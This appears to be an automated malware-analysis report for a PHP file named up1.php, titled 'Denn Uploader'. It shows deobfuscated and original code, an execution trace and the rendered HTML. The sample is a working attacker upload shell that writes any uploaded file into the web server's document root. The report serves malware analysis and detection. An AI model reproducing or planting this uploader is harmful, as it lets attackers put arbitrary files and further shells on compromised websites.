PHP Malware Analysis
up1.php
md5: 194c29728ff0b27d92ea800ff813acff
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Title
- Denn Uploader (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<html>
<title>Denn Uploader</title>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>\r\n <input type='file' name='idx_file'>\r\n <input type='submit' name='upload' value='upload'>\r\n </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
if (is_writable($root)) {
if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://" . $_SERVER['HTTP_HOST'] . "/";
echo "Gass Lah Kontol:v -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Akses File Nya : <b>{$files}</b> di folder ini";
} else {
echo "gagal upload Cok >:(";
}
}
}Execution traces
data/traces/194c29728ff0b27d92ea800ff813acff_trace-1676258878.3373.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:28:24.235189]
1 0 1 0.000177 393512
1 3 0 0.000253 398768 {main} 1 /var/www/html/uploads/up1.php 0 0
1 A /var/www/html/uploads/up1.php 8 $root = '/var/www/html'
1 A /var/www/html/uploads/up1.php 9 $files = NULL
1 A /var/www/html/uploads/up1.php 10 $dest = '/var/www/html/'
1 3 1 0.000332 398808
0.000359 314360
TRACE END [2023-02-13 01:28:24.235403]
Generated HTML code
<html><head><title>Denn Uploader</title>
</head><body><center><form method="post" enctype="multipart/form-data">
<input type="file" name="idx_file">
<input type="submit" name="upload" value="upload">
</form></center></body></html>Original PHP code
<html>
<title>Denn Uploader</title>
<center><?php
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/";
echo "Gass Lah Kontol:v -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload root >:(";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "Akses File Nya : <b>$files</b> di folder ini";
} else {
echo "gagal upload Cok >:(";
}
}
}
?>